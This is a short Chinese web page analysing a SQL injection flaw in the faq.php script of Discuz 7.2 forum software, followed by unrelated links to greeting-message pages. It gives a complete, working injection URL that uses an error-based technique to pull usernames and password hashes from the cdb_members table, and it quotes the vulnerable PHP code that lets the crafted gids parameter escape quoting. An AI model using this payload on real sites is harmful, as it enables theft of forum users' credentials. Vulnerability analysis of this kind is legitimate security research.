Discuz7.2版的faq.php SQL注入漏洞分析
注入代码实例:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
漏洞分析:byphithon
($action=='grouppermission'){
... ksort($gids); $groupids=array(); foreach($gidsas$row){ $groupids[]=$row[0]; }
$query=$db->query("SELECT*FROM{$tablepre}usergroupsuLEFTJOIN{$tablepre}admingroupsaONu.groupid=a.admingidWHEREu.groupidIN(".implodeids($groupids).")"); ... } functionimplodeids($array){ if(!empty($array)){ return"'".implode("','",is_array($array)?$array:array($array))."'"; }else{ return''; } }
热门推荐
7 简短的二胎祝福语
10 简短霸气女儿生日 祝福语
11 祝福语高考小众诗句简短
12 元旦祝福语20秒简短
13 老师过年祝福语大全 简短
14 一生祝福语简短
15 产检祝福语简短霸气
16 朋友店开张祝福语简短
17 生日爱情祝福语大全简短
18 朋友女儿生日祝福语 简短